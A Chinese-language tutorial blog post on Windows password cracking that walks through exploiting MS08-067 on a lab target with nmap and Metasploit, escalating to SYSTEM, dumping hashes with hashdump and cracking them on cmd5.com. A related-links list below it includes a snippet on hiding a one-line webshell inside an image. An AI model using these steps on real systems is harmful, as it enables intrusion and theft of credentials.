windows密码破解(哈希破解技术)

2023-11-09

一.windows密码与哈希

1.我们用于登录的windows密码,在windows系统中会进行加密。一般密码加密文件储存在c盘的windows\system32\config目录下,文件名是SAM文件。在system目录下有两个非常重要的文件
A.SAM文件储存着windows密码,使用LM或者NT算法加密成明文哈希,再由syskey加密成乱码的二次密文
B.SYSTEM文件密钥文件,有一个程序syskey,对上面的SAM文件进行第一次的解密,解密成明文的哈希值

我们使用反编译技术就可以获得密码

二.实战(利用ms08-067)

1.使用nmap扫描目标靶机(靶机ip)

nmap --script=vuln 192.168.1.183

发现目标存在ms08-067漏洞

2.启动渗透利用框架

metasploit

3.搜索该漏洞

search ms08-067

4.使用攻击模块

use exploit/windows/smb/ms08_067_netapi

5.显示要设置的参数

show options

6.设置参数(kali ip)

set RHOSTS 192.168.1.176

7.执行

run

8.查看权限

getuid

如管显示是SYSTEM就可以,否则输入getsystem直到显示SYSTEM

9.下载目标一次解密的密码

hashdump

复制密文

10.cmd5网站解密
www.cmd5.com

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

windows密码破解(哈希破解技术) 的相关文章

  • 菜刀连接图片一句话木马

    1 先制作图片一句话木马 找好一张图片如 fox jpg 并且准备好一句话脚本php文件fox php 在图片所在文件夹打开cmd命令行 执行命令 copy fox jpg b fox php a fox1 jpg 生成图片一句话文件fox
  • windows7 防火墙关于文件共享的设置

    WIN7自带防火墙的设置相较XP下有了较大的变化 近日在设置文件夹共享上遇到了一些小问题 后来解决了 过程如下 首先 在文件夹上右键 属性 共享 里 高级共享 共享此文件夹 然后给Everyone用户以读的权限 这一步和在XP下没什么区别
  • BigDecimal 前后端交互失去精度

    在Controller层通过 ResponseBody将返回数据自动转换成json时 不做任何处理 而直接传给前端的话 在BigDecimal长度大于17位 不包括小数点 会出现精度丢失 在Long长度大于17位时也会出现精度丢失的问题 解
  • C语言实现字典树

    leetcode 208的代码 include
  • 商用密码应用安全性评估测评过程指南_商用密码应用安全性评估的具体评估内容...

    如何合规 正确 有效使用商用密码 充分发挥商用密码在保障网络空间安全中的核心技术和基础支撑作用 关乎国家大局 关乎网络空间安全 关乎用户个人隐私 因此 要在保证商用密码应用大力推进和普及的同时 做好网络与信息系统的商用密码应用安全性评估 确
  • 前端系列之JavaScript(BOM对象)

    什么是BOM BOM browser object model 浏览器对象模型 window对象 全局对象 说明 所有的全局变量和全局方法都被归为window上
  • Mysql日期格式转化问题

    MySQL索引优化 MySQL慢查询优化 一文详解MySQL各种锁及MVCC的使用场景及原理 最近遇到一个需求 大致内容是查询近七天内所有设备每天的工作时间和 里面涉及到日期格式转化 子查询 分组查询等问题 较为复杂 以此记录 数据库内容
  • OpenCV-Python图像直方图计算calcHist函数详解、示例及图形呈现

    前往老猿Python博文目录 https blog csdn net LaoYuanPython 一 引言 在前面几篇直方图相关的文章中介绍了直方图均衡 直方图匹配 局部直方图处理 基于直方图统计信息进行图像增强处理等图像处理与直方图相关的
  • 【面试系列】对称二叉树

    题意 原题链接 代码 Definition for a binary tree node struct TreeNode int val TreeNode left TreeNode right TreeNode val 0 left nu
  • Java集合之NavigableMap与NavigableSet接口

    author lidx 本文接着上篇介绍SortedMap和SortedSet接口 介绍他们的扩展接口NavigableMap与NavigableSet接口 提供了针对给定搜索目标返回最接近匹配项的导航方法 SortedMap和Sorted
  • java.io.IOException: Invalid header signature; rea

    异常 java io IOException Invalid header signature read 4503608217567241 expected 2226271756974174256 資料來源 http hi baidu co
  • 基于SkyWalking实现SpringBoot在K8S中的链路跟踪实践

    一 安装SkyWalking服务 1 下载SkyWalking APM https skywalking apache org downloads 这里下载Distribution的v9 0 0版本tar并解压 2 进入bin目录分别启动o
  • 【linux】ssh 远程执行命令

    1 概述 转载并且补充 ssh 远程执行命令 SSH 是 Linux 下进行远程连接的基本工具 但是如果仅仅用它来登录那可是太浪费啦 SSH 命令可是完成远程操作的神器啊 借助它我们可以把很多的远程操作自动化掉 下面就对 SSH 的远程操作
  • IP包结构

    版本 Version 4位 IP版本号 包头长 IHL 4位 以4字节为单位 如0101表示IP包的包头长度20字节 服务类型 TOS Type of service 1字节 指示路由器如何处理该数据包 总长 Total Length 2字
  • STM32单片机采集模拟电压转换为数字信号(stm32cubemx+keil+proteus+c)

    本文参考了CSDN博主安迪西ADC模数转换的文章代码 作对正弦曲线 or比如温度压强等 的模数转换 0 3 3转0 4096 由于proteus virtual terminal难以输出单精度或双精度实数 故直接输出0 4096 若要转为电
  • 洛必达法则介绍及使用注意点

    洛必达法则是个好法则 我们都很喜欢用它 但稍不注意可能就落入陷阱了 尤其是考研的同学 出题老师可能会故意在细节上考察大家 所以本篇讲一下洛必达法则3大陷阱 提防着点总是好的 1 洛必达法则内容 2 粗略证明 注意 不是严谨证明 主要理解思路
  • ode45求解微分方程(MATLAB)

    首先介绍一下ode45的格式 t y ode45 odefun tspan y0 t y ode45 odefun tspan y0 options t y te ye ie ode45 odefun tspan y0 options so
  • 新手在Ubuntu 20.04系统中编译安装Snort+Barnyard+BASE的难点问题

    1 准备安装软件 准备阶段新手经常会下错版本导致安装失败 2 安装DAQ 2 0 7报错 核心问题 预编译时出现下面的报错信息 解决 apt install bison flex 接着 make编译软件 会继续报错 解决 aclocal a
  • webrtc 常用编译参数列表

    additional target cpus Current value from the default From build config ios ios sdk gni 58 If non empty this list must c
  • web自动化-单选框、复选框、下拉框定位操作

    一 前言 单选框和复选框的话 一般根据单选框按钮和复选框按钮去进行元素定位 如有iframe页面嵌套 则需要切换iframe 一般去定位的话 用八大元素定位的方法差不多就可以满足了 接下来将会讲解下拉框的操作 下拉框里面的元素支持多选 单选

随机推荐